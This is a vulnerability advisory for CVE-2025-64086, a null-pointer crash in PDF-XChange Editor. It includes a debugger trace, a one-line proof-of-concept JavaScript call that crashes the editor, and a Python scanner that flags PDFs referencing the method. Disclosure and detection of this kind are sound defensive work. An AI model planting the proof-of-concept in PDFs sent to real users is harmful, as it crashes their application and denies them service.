
PDF-XChange Editor readFileIntoStream() Denial of Service Vulnerability

CVE Number: CVE-2025-64086
Vendor: PDF-XChange
Credit: Lee Kwang Hui

Description

In PDF-XChange Editor 10.7.2.400, an Access Violation occurs when the `util.readFileIntoStream` method is invoked. If a user opens a maliciously crafted PDF file, the application terminates immediately, resulting in a Denial-of-Service condition.

Details

The access violation occurs at the following instruction:

```
(5e78.60c8): Access violation - code c0000005 (!!! second chance !!!)
PDFXEditCore_x64!PXV_GetInstance+0x7252e1:
00007fff`bfb855e1 488b08          mov     rcx,qword ptr [rax] ds:00000000`00000000=????????????????
```

When the `util.readFileIntoStream` call fails to create a file stream object, the object is not properly initialized and remains in a zeroed state. Subsequent use of this object results in a null pointer dereference.

The PoC is as follows:

```
util.readFileIntoStream([], 65535)
```
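For triage before a patch is deployed, the following added example (not part of the original advisory or any vendor tooling) flags PDF files whose raw bytes or Flate-compressed streams reference the affected API name. The scanning approach, the helper names and the sample fragments are assumptions constructed for illustration.

```python
import re
import zlib

# API name from the advisory; the scanning approach itself is an assumption.
NEEDLE = b"readFileIntoStream"
# Raw bytes between the "stream" and "endstream" keywords of each PDF object.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\n?endstream", re.DOTALL)


def inflate(data: bytes) -> bytes:
    """Best-effort FlateDecode; returns b'' when the data is not zlib."""
    try:
        return zlib.decompressobj().decompress(data)
    except zlib.error:
        return b""


def find_calls(pdf_bytes: bytes) -> list:
    """List where the API name appears: 'raw' and/or 'stream N'."""
    hits = []
    if NEEDLE in pdf_bytes:
        hits.append("raw")
    for i, m in enumerate(STREAM_RE.finditer(pdf_bytes)):
        if NEEDLE in inflate(m.group(1)):
            hits.append(f"stream {i}")
    return hits


def make_sample(js: bytes, compress: bool) -> bytes:
    """Constructed PDF fragment (not a complete PDF) with one JS stream."""
    body = zlib.compress(js) if compress else js
    flt = b"/Filter /FlateDecode " if compress else b""
    head = b"%PDF-1.7\n1 0 obj\n<< " + flt + b"/Length %d >>\nstream\n" % len(body)
    return head + body + b"\nendstream\nendobj\n"


if __name__ == "__main__":
    js = b'var s = util.readFileIntoStream("/c/temp/report.txt");'  # constructed
    print(find_calls(make_sample(js, compress=True)))
    print(find_calls(make_sample(js, compress=False)))
    print(find_calls(make_sample(b"app.alert('hi');", compress=True)))
```

A hit is a triage signal only: the scan does not handle encrypted documents, filters other than FlateDecode, or scripts that build the method name from string fragments.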

Timeline

2025-10-19 - Vulnerability reported to Vendor

- Vendor Patch Release